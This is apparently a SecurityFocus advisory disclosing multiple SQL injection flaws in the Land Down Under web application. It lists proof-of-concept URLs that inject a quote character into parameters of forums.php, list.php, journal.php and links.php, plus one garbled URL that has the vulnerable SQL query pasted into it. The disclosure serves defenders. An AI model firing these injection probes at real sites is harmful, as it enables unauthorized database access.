Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Land Down Under Multiple SQL Injection Vulnerabilities

No exploit is required.

The following proof-of-concept URIs are available:

http://www.example.com/ldu/forums.php?m=topics&s='
http://www.example.com/ldu/list.php?c=articles&s=title&w=asc&o='&p=1
http://www.example.com/ldu/list.php?c=articles&s=title&w='&o=1&p=1
http://www.example.com/ldu/list.php?c=articles&s='&w=asc&o=1&p=1
http://www.example.com/ldu/journal.php?m='&s=username&w=asc
http://www.example.com/ldu/journal.php?m='&p=1
http://www.example.com/ldu/journal.php?m='
http://www.example.com/ldu/forums.php?filter=forums%2Ephp%3Fc%3Dskin&x='
http://www.example.com/ldu/forums.php?m=topics&q=3&n='
http://www.example.com/ldu/list.php?c=articles&s=title&w=asc&o=1&p='
http://www.example.com/ldu/forums.php?m='&q=3&n=last
http://www.example.com/ldu/links.php?c=links&s=title&w='
http://www.example.comldu//journal.php?m='&s=username&w=SELECT * FROM $db_journals WHERE jrn_userid='$jrn_userid' AND jrn_minlevel<='".$usr['level']."' ORDER BY jrn_$s $w







 

Privacy Statement
Copyright 2009, SecurityFocus